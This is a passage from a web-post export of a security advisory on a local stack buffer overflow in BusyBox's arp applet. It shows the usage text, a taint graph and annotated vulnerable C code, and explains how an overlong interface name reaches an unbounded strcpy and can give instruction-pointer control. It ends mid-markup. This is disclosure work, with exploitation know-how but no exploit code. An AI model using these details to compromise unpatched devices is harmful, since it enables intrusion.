{"id":6277,"date":"2017-01-23T14:08:04","date_gmt":"2017-01-23T22:08:04","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-128\/"},"modified":"2017-01-23T14:08:04","modified_gmt":"2017-01-23T22:08:04","slug":"news-128","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-128\/","title":{"rendered":"SSD Advisory &#8211; BusyBox (local) cmdline stack buffer overwrite"},"content":{"rendered":"<div class=\"entry-content\">\n<p><strong>Vulnerability Description<\/strong><br \/> BusyBox provides an <code>arp<\/code> applet which is missing an array bounds check for command-line parameter <code>IFNAME<\/code>. It is therefore vulnerable to a command-line based local stack buffer overwrite effectively allowing local users to write past a 16 bytes fixed stack buffer. This leads to two scenarios, one (A) where an IOCTL for GET_HW_ADDRESS (<code>SIOCGIFHWADDR<\/code>) fails and results in a corrupted <code>va_list<\/code> being passed to <code>*printf()<\/code> and one (B) where an attacker might provide valid params for the IOCTL and trick the program to proceed and result in a <code>RET eip overwrite<\/code> eventually gaining code execution.<\/p>\n<p><span id=\"more-2725\"><\/span><\/p>\n<p><strong>Technical Details<\/strong><br \/> By providing an overly long string for param <code>IFNAME<\/code> while setting <code>-D<\/code> (read HW Address from IFACE) and <code>-s<\/code> (set new entry) a strcpy operation can be reached that allows to write past the stack buffer <code>ifreq.ifr_name[IFANMESIZ]<\/code> [5,6]<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ec288f78721234444\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \t# .\/busybox arp &#8211;help  \tBusyBox v1.23.0.git (2014-12-26 19:27:13 CET) multi-call binary.  \t  \tUsage: arp  \t[-vn]   [-H HWTYPE] [-i IF] -a [HOSTNAME]  \t[-v]                [-i IF] -d HOSTNAME [pub]  \t[-v]    [-H HWTYPE] [-i IF] -s HOSTNAME HWADDR [temp]  \t[-v]    [-H HWTYPE] [-i IF] -s HOSTNAME HWADDR [netmask MASK] pub  \t[-v]    [-H HWTYPE] [-i IF] -Ds HOSTNAME IFACE [netmask MASK] pub  \t  \tManipulate ARP cache  \t  \t        -a              Display (all) hosts  \t        -d              Delete ARP entry  \t        -s              Set new entry  \t        -v              Verbose  \t        -n              Don&#8217;t resolve names  \t        -i IF           Network interface  \t        -D              Read HWADDR from IFACE  \t        -A,-p AF        Protocol family  \t        -H HWTYPE       Hardware address type<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0040 seconds] -->  <\/p>\n<p><strong>Details: arp.c<\/strong><\/p>\n<p>The stack buffer overflow manifests in arp.c<\/p>\n<p><strong>Taint Graph<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ec288f84496909071\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \tbusybox arp   \t-&gt; arp.c:477  &#8211; arp_main (argc, argv)  \t -&gt; arp.c:524  &#8211; arp_set (argv)  \t  -&gt; arp.c:263: &#8211; arp_getdevhw (ifname=*args++)  \t   -&gt; arp.c:332: &#8211; strcpy (dst=fixed_buffer,src=ifname)   \t   \/\/ &#8212; stack is messed up now &#8211; arbitrary stack local vars overwritten already (including stored eip) &#8212;  \t   -&gt; arp.c:222 ioctl_or_perror_and_die(,,ifr,&lt;static_string&gt;,ifname)  \t   \/\/ A) ioctl_or_perror_and_die &#8211; FAILS &#8211; due to messed up stack  \t       -&gt; xfuncs_printf.c:508  &#8211; bb_verror_msg(fmt=&lt;static_string&gt;,valist p,strerr(errno))  \t        -&gt; verror_msg.c:31  &#8211; vasprintf(&amp;msg, s=fmt, valist p);  \t   \/\/ B) ioctl_or_perror_and_die &#8211; SUCCEEDS &#8211; due to attacker providing reasonable values for IOCTL  \t      -&gt; arp.c:238  &#8211; RETURN &#8211; stack messed up, direct eip control<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f84496909071-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f84496909071-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f84496909071-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f84496909071-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f84496909071-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f84496909071-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f84496909071-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f84496909071-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f84496909071-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f84496909071-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f84496909071-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f84496909071-12\">12<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867ec288f84496909071-1\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">busybox <\/span><span class=\"crayon-v\">arp<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f84496909071-2\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">477<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">arp_main<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">argc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f84496909071-3\"><span class=\"crayon-h\">\t <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">524<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">arp_set<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f84496909071-4\"><span class=\"crayon-h\">\t&nbsp;&nbsp;<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">263<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">arp_getdevhw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ifname<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f84496909071-5\"><span class=\"crayon-h\">\t&nbsp;&nbsp; <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">332<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strcpy<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">dst<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">fixed_buffer<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">ifname<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f84496909071-6\"><span class=\"crayon-h\">\t&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/ &#8212; stack is messed up now &#8211; arbitrary stack local vars overwritten already (including stored eip) &#8212;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f84496909071-7\"><span class=\"crayon-h\">\t&nbsp;&nbsp; <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">222<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ioctl_or_perror_and_die<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">ifr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">static_string<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">ifname<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f84496909071-8\"><span class=\"crayon-h\">\t&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/ A) ioctl_or_perror_and_die &#8211; FAILS &#8211; due to messed up stack<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f84496909071-9\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfuncs_printf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">508<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bb_verror_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fmt<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">static_string<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-i\">valist<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">strerr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">errno<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f84496909071-10\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">verror_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">31<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">vasprintf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">fmt<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">valist<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f84496909071-11\"><span class=\"crayon-h\">\t&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/ B) ioctl_or_perror_and_die &#8211; SUCCEEDS &#8211; due to attacker providing reasonable values for IOCTL<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f84496909071-12\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">238<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">RETURN<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">stack <\/span><span class=\"crayon-e\">messed <\/span><span class=\"crayon-v\">up<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">direct <\/span><span class=\"crayon-e\">eip <\/span><span class=\"crayon-v\">control<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0028 seconds] -->  <\/p>\n<p><strong>Vulnerable Code<\/strong><br \/> 1. No bounds check in <code>arp_main<\/code><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ec288f87106375534\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \t\tint arp_main(int argc UNUSED_PARAM, char **argv)  \t\t{  \t\t\t&#8230;  \t\t\t\/* Now see what we have to do here&#8230; *\/  \t\t\tif (opts &amp; (ARP_OPT_d | ARP_OPT_s)) {\t\t    \/** !! -d and -s  must be set*\/  \t\t\t\tif (argv[0] == NULL)\t\t\t\t\t\t\/** !! argument must be set == IFNAME*\/  \t\t\t\t\tbb_error_msg_and_die(&#8220;need host name&#8221;);  \t\t\t\tif (opts &amp; ARP_OPT_s)  \t\t\t\t\treturn arp_set(argv);\t\t\t\t\t\/** !! argv never checked, pass to arp_set (tainted)*\/  \t\t\t\treturn arp_del(argv);  \t\t\t}  \t\t\t&#8230;  \t\t}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f87106375534-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f87106375534-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f87106375534-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f87106375534-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f87106375534-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f87106375534-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f87106375534-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f87106375534-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f87106375534-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f87106375534-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f87106375534-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f87106375534-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f87106375534-13\">13<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867ec288f87106375534-1\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">arp_main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">argc <\/span><span class=\"crayon-v\">UNUSED_PARAM<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f87106375534-2\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f87106375534-3\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f87106375534-4\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-c\">\/* Now see what we have to do here&#8230; *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f87106375534-5\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">opts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ARP_OPT_d<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ARP_OPT_s<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\">\t\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/** !! -d and -s&nbsp;&nbsp;must be set*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f87106375534-6\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">\t\t\t\t\t\t<\/span><span class=\"crayon-c\">\/** !! argument must be set == IFNAME*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f87106375534-7\"><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-e\">bb_error_msg_and_die<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;need host name&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f87106375534-8\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">opts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ARP_OPT_s<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f87106375534-9\"><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">arp_set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-c\">\/** !! argv never checked, pass to arp_set (tainted)*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f87106375534-10\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">arp_del<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f87106375534-11\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f87106375534-12\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f87106375534-13\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p>2. No bounds check in arp_set<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ec288f8a892712356\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div 